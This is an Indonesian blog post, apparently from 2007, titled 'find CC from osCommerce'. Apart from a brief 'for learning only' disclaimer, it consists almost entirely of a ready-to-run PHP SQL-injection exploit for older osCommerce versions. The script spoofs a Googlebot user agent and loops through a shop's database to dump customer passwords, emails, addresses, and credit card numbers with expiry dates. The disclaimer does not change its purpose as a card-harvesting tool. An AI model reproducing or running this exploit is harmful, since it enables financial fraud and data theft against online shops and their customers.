Wednesday, October 31, 2007

Cari CC dari osCommerce

Artikel ini hanya untuk pembelajaran saja untuk para webmaster. Tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik; saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini.
Cari CC dari osCommerce — Dapatkan CC Info dari bug osCommerce

————– Exploit Code ————-

#!/usr/bin/php -q -d short_open_tag=on

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

if ($argc<5) {
echo ” Exploit osCommerce < 2.2 Milestone 2 060817 “;
echo ” Usage: php “.$argv[0].” host path product_id whatinfo OPTIONS “;
echo ” host - target server (ip/hostname) “;
echo ” path - path to osCommerce “;
echo ” product_id - Valid product_id “;
echo ” whatinfo - pass for password, cc for credit card info, addr for address “;
echo “Options: “;
echo ” -D: Show debug or verbose on “;
echo ” -p[port]: specify a port other than 80 “;
echo ” -P[ip:port]: specify a proxy “;
echo “Example: “;
echo ” php “.$argv[0].” localhost /os2/catalog/ 2 pass “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;
die;
}

$host=$argv[1];
$path=$argv[2];
$products_id=$argv[3];
$whatinfo=$argv[4];
$port=80;
$Debug=0;
$proxy=”";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
if ($temp==”-D”)
{
$tmp=str_replace(”-D”,”",$argv[$i]);
$Debug=1;
}
}

if (($path[0]<>´/´) or ($path[strlen($path)-1]<>´/´)) {echo ´Error… check the path!´; die;}

if($Debug==1) {
echo “Name : osCommerce Multiple Vulnerabilities “;
echo “Date : August 17, 2006 “;
echo “Vendor : osCommerce “;
echo “URL : http://www.oscommerce.com/ “;
echo “Version : osCommerce < 2.2 Milestone 2 060817 “;
echo “Risk : Multiple Vulnerabilities “;
echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;
echo “Author : Perseus “;
echo “Compatibility : magic_quotes_gpc off, union supported “;
echo “Greets : rgod, James Bercegay, str0ke, hdm, r57 “;
}

// try if you can rewrite this code to attack osc with magic_quotes_gpc on
// because I found it impossible for the moment.
// this will make oscommerce people update their vuln servers right now.

$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;
if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}
$loop = 1000;

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex, $Debug;
if ($proxy==´´) {
if($Debug==1) echo ” Processing packets directly… “;
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ” No response from “.$host.”:”.$port.” “; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ´Not a valid proxy…´;die;
}
$parts=explode(´:´,$proxy);
if($Debug==1) echo ” Processing packets using proxy “.$parts[0].”:”.$parts[1].” … “;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ” No response from proxy… “;die;
}
}
fputs($ock,$packet);
if ($proxy==´´) {
$html=´´;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=´´;
while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {
$html.=fread($ock,1);
}
}

fclose($ock);
#debug
#echo ” “.$html;
}
$bl=0;
for($y=0;$y<=$loop;$y++) {
//1. get cookie
$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
$e = explode(”Set-Cookie: osCsid=”,$html);
$e2 = explode(”;”,$e[1]);
$cookie = $e2[0];

//2. injection
if($whatinfo==”pass”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0
FROM customers LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”addr”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0
FROM address_book LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”cc”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0
FROM orders LIMIT “.$y.”,1 /*”;

}

$sql=urlencode($sql);
$data = “id[0]=”.$sql.”";
$data.=”&products_id=”.$products_id.”";
$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&action=add_product&osCsid=”.$cookie.” HTTP/1.0 “;
$out .= “User-Agent: Googlebot/2.1 “;
$out .= “Host: “.$host.” “;
$out .= “Accept: text/plain “;
$out .= “Connection: Close “;
$out .= “Content-Type: application/x-www-form-urlencoded “;
$out .= “Cookie: “.$cookie.” “;
$out .= “Content-Length: “.strlen($data).” “;
$out .= $data;
sendpacketii($out);

//3. get vals
$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
//echo $html;
$e = explode(”M||||”,$html);
$e2 = explode(”^”,$e[1]);
$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;
echo $str;
$strl = strlen($str);
if($strl<=25) $bl++;
if($bl==3) break;

}

?>

——- End Code ———–
